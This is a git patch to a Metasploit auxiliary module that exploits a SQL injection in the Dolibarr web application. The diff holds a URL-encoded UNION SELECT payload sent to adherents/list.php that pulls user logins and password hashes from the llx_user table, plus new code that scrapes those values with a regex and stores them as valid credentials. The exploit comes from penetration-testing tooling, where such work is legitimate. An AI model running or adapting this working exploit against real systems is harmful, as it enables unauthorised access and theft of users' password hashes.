From 85c4abac995a6dbeeb6f93ff8f2ef797469b54a7 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Thu, 30 Aug 2018 13:59:00 -0500
Subject: [PATCH] storing credentials

---
 .../sqli/oracle/dolibarr_list_creds.rb        | 20 ++++++++++++++-----
 1 file changed, 15 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
index cc214f91a0..2525875ebe 100644
--- a/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
+++ b/modules/auxiliary/sqli/oracle/dolibarr_list_creds.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
 
     login_uri = target_uri.path << '/index.php' unless target_uri.path.include?('index.php')
     cookies = response.get_cookies
-    print_good(cookies)
+    print_status("Logging in...")
 
     login_res = send_request_cgi(
        'method'  =>  'POST',
@@ -67,24 +67,34 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
     end
 
-    print_good("Logged in!")
+    print_good("Successfully logged into Dolibarr")
     return cookies
   end
 
   def get_info(cookies)
     inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
-    print_good(normalize_uri(inject_uri))
     inject_res = send_request_cgi(
       'method'  =>  'GET',
       'uri'     => normalize_uri(inject_uri),
       'cookie'  => cookies
     )
 
-    print_good(inject_res.body)
+    unless inject_res && inject_res.body.include?('id="searchFormList"')
+     fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
+    end
+
+    print_good("Accessed credentials")
+    format_results(inject_res.body)
   end
 
-  def format_results
+  def format_results(output)
+    credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)
 
+    unless credentials
+      fail_with(Failure::NotFound, "No credentials found")
+    end
+
+    credentials.each { |i, j| store_valid_credential(user: j, private: i) }
   end
 
   def run